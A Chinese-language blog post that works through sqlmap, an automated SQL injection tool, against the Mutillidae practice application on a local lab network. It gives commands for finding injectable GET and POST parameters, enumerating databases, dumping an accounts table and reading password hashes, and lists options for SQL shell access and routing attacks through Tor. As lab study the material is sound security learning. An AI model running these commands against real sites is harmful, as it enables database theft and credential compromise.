Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1790131
  • 博文数量: 297
  • 博客积分: 285
  • 博客等级: 二等列兵
  • 技术积分: 3006
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-06 22:04
个人简介

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

文章分类

全部博文(297)

文章存档

2020年(11)

2019年(15)

2018年(43)

2017年(79)

2016年(79)

2015年(58)

2014年(1)

2013年(8)

2012年(3)

分类: 网络与安全

2017-11-06 14:46:45

以前都是手动注入今天开始使用工具sqlmap .

1. 首先使用GET方法来inject, 使用GET方法注入很简单 eg:

要注入的页面是:

点击(此处)折叠或打开

  1. http://192.168.0.105/mutillidae/index.php?page=user-info.php
命令如下:

点击(此处)折叠或打开

  1. #use sqlmap to check whether the URL are injectable
  2. sqlmap -u ""

  3. #列出所有数据库
  4. sqlmap -u "" --dbs

  5. #列出当前用户
  6. sqlmap -u "" --current-user

  7. #列出所有的表和表结构
  8. sqlmap -u "" --schema

  9. #dump all the data from table
  10. sqlmap -u "" --columns -T accounts -D owasp10 --dump

2. 使用POST方法注入: 重点在当POST data的时候,Always specify the submit parameter name and its default value.
例如我尝试注入如下页面:

点击(此处)折叠或打开

  1. http://192.168.0.119/mutillidae/index.php?page=login.php
正确的写法是:

点击(此处)折叠或打开

  1. sqlmap -u "" --data="username=admin&password=admin&login-php-submit-button=login" --dbs
  2. #如果写成下面,得到的结果是not injectable.
  3. sqlmap -u "" --data="username=admin&password=admin" --dbs

3. sqlmap 会自动的parse form.
因此也可以这样用:

点击(此处)折叠或打开

  1. sqlmap --forms -u "" --dbs

4.  有些时候,可以test HTTP headers. 使用--level

点击(此处)折叠或打开

  1. sqlmap --forms -u "" --dbs --level 5

5. sqlmap的其他一些参数:

点击(此处)折叠或打开

  1. sqlmap -r [HTTP_FILE]
  2. --method: method for post or get.
  3. --data: pass the parameter
  4. -p: specify the injectable field.
  5. -f: Performs extension fingerprint of the database.
  6. -b: Retrieves the DBMS banner.
  7. --sql-shell: accesses the SQL shell prompt after successful exploitation.
  8. --schema: Enumerates the database schema.
  9. --comments: searches for comments in the database.
  10. --reg-read: Reads a Windows registry key value.
  11. --identify-waf: identifies WAF/IPS protection.

  12. Enumeration:
  13.     These options can be used to enumerate the back-end database
  14.     management system information, structure and data contained in the
  15.     tables. Moreover you can run your own SQL statements

  16.     -a, --all Retrieve everything
  17.     -b, --banner Retrieve DBMS banner
  18.     --current-user Retrieve DBMS current user
  19.     --current-db Retrieve DBMS current database
  20.     --passwords Enumerate DBMS users password hashes
  21.     --tables Enumerate DBMS database tables
  22.     --columns Enumerate DBMS database table columns
  23.     --schema Enumerate DBMS schema
  24.     --dump Dump DBMS database table entries
  25.     --dump-all Dump all DBMS databases tables entries
  26.     -D DB DBMS database to enumerate
  27.     -T TBL DBMS database table(s) to enumerate
  28.     -C COL DBMS database table column(s) to enumerate

  29.  #The important arguments that are available for you are -

  30.     -u : This is the most important parameter, because this is where you give the url where the request is supposed to be made.( For a POST request make sure you give the correct url i.e the place where the corresponding form is posting rather than the page where the form is present :P)
  31.     --data : When you provide this argument with some data, sqlmap will perform POST requests automatically. The POST data of a request can be written directly, if help needed use some tool like ZAP or Burp Suite or Live HTTP Headers to get the post data
  32.     --threads=5 #5线程

  33. #Some other important arguments that are usefull -

  34.     --proxy : This is used when you wish to tunnel all your requests through a proxy. The protocol must also be mentioned here.
  35.     --proxy-cred : This is used to provide credentials for proxy server.
  36.     --tor : This allows you to use tor anonymity network.( –tor-port & –tor-type are used if these settings are different from the default values )

参考资料:
Sqlmap usage:


阅读(837) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~